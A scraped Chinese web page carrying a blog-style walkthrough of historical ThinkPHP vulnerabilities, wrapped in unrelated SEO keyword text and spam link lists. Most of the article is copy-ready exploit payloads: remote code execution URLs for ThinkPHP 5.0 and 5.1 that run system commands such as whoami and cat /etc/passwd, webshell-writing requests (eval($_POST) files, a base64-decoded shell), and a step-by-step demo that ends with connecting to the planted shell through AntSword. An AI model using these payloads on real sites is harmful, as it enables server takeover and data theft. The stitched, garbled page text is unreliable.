当前位置: 首页 > news >正文

建立大型网站流程怎么识别网站开发语言

建立大型网站流程,怎么识别网站开发语言,wordpress文章全显示不出来,资阳网站建设方案常见历史漏洞之Thinkphp 一、介绍二、Thinkphp历史漏洞三、Thinkphp特征发现四、批量漏洞检测五、漏洞总结六、5.0.23版本案例演示 一、介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开… 常见历史漏洞之Thinkphp 一、介绍二、Thinkphp历史漏洞三、Thinkphp特征发现四、批量漏洞检测五、漏洞总结六、5.0.23版本案例演示 一、介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开发的所以thinkphp出问题的话会影响很多基于thinkphp开发的网站。 二、Thinkphp历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致GetshellThinkPHP5_SQL注入漏洞敏感信息泄露ThinkPHP3.2.3_最新版update注入漏洞ThinkPHP5.0.10缓存函数设计缺陷可导致GetshellThinkPHP3.2.X_find_select_delete注入ThinkPHP框架5.0.X_sql注入漏洞分析ThinkPHP3.X_order_by注入漏洞ThinkPHP5.X_order_by注入漏洞ThinkPHP5.X_远程代码执行 三、Thinkphp特征发现 默认页面 错误页面 开启了debug模式的错误页面 - 未开启debug模式的错误页面四、批量漏洞检测 https://github.com/Lucifer1993/TPscan python TPscan.pyhttps://github.com/theLSA/tp5-getshell python2.7 tp5-getshell.py -u http://192.168.9.148:8080/说明漏洞存在可以进行漏洞利用。使用ThinkphpGUI-1.2-SNAPSHOT进行漏洞扫描和命令执行。 切换版本进行命令执行。 五、漏洞总结 Thinkphp3 漏洞总结https://y4er.com/post/thinkphp3-vuln/ Thinkphp5 RCE总结https://y4er.com/post/thinkphp5-rce/ 5.0.* 常用PoC #执行命令 /index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami /index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1#写入Webshell /index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]file_put_contentsvars[1][]shell.phpvars[1][]?php eval($_POST[ccc]);?/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg | base64 -d shell9.php 5.1.* 常用PoC #执行命令 /index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1 /index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami /index.php?sindex/\think\Request/inputfiltersystemdataid (dir ls) /index.php?s/index/\think\request/cachekey1|phpinfo#写入Webshell /index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo ?php eval($_POST[ccc]);? shell.php (echo ^?php eval($_POST[ccc]);?^ shell1.php)/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1]]whoami /index.php?sindex/\think\Request/inputfilterphpinfodata1 /index.php?sindex/\think\Request/inputfiltersystemdataid (dir ls) /index.php?sindex/\think\template\driver\file/writecacheFileshell.phpcontent%3C?php%20phpinfo();?%3E /index.php?sindex/\think\view\driver\Php/displaycontent%3C?php%20phpinfo();?%3E /index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1六、5.0.23版本案例演示 1、查看。 #查看 /index.php?scaptcha _method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]cat /etc/passwd_method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]ls2、写入木马文件。 /index.php?scaptcha _method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]echo ?php eval(\$_POST[cmd]);? 1.php3、写入成功。 4、使用蚁剑进行连接。
http://www.yutouwan.com/news/190531/

相关文章:

  • 网站推广软件下载安装免费全国企业信息公示官网
  • 网站建设 运维 管理包括大型门户网站模板
  • 做群头像的网站在线做网站之前要先购买服务器吗
  • 重庆茶叶网站建设做网站的上海市哪家技术好
  • 网站制作老了ppt免费模板下载网站有哪些
  • 建站软件排行榜app广告联盟
  • 自己建一个外贸网站应用商店下载app软件
  • 兰溪市建设局官方网站优化搜索点击次数的方法
  • 找人开发一个网站多少钱wordpress 订阅插件
  • 京鑫建设集团网站怎么用网吧电脑做网站服务器吗
  • 怎么做html5网站吗网页设计大赛策划书
  • 做外贸网站 怎么收钱做婚庆网站的功能定位
  • 网站模板炫酷淘宝运营工作内容
  • 顺德医疗网站建设专业的外贸行业网站制作
  • 网站建设收税网站备案类型有哪些
  • 正规网站建设团队是什么wordpress 系统环境
  • 建站仅向商家提供技术服务wordpress缩略图地址
  • 做58同城这样的网站有哪些如何美化wordpress页面
  • 奖励软件下载网站站长网站的优势
  • 丽水公司做网站网站后台密码忘记了
  • 谭谭心怎么建设网站wordpress 代码解读
  • 网站后台如何登陆盐山网站建设
  • jsp网站开发实训报告网站建设的素材处理方式
  • 建筑图纸网站哪个酒店网站做的好看的
  • 腾讯建设网站首页怎么做有趣视频网站
  • 柳州做网站人员自助建网站平台
  • 石景山高端网站建设普陀网站建设公司
  • 自助建站设计工作主要包括做任务的阅币漫画网站
  • cms网站群管理系统php做的购物网站系统下载
  • 满城做网站电话wordpress和vue哪个好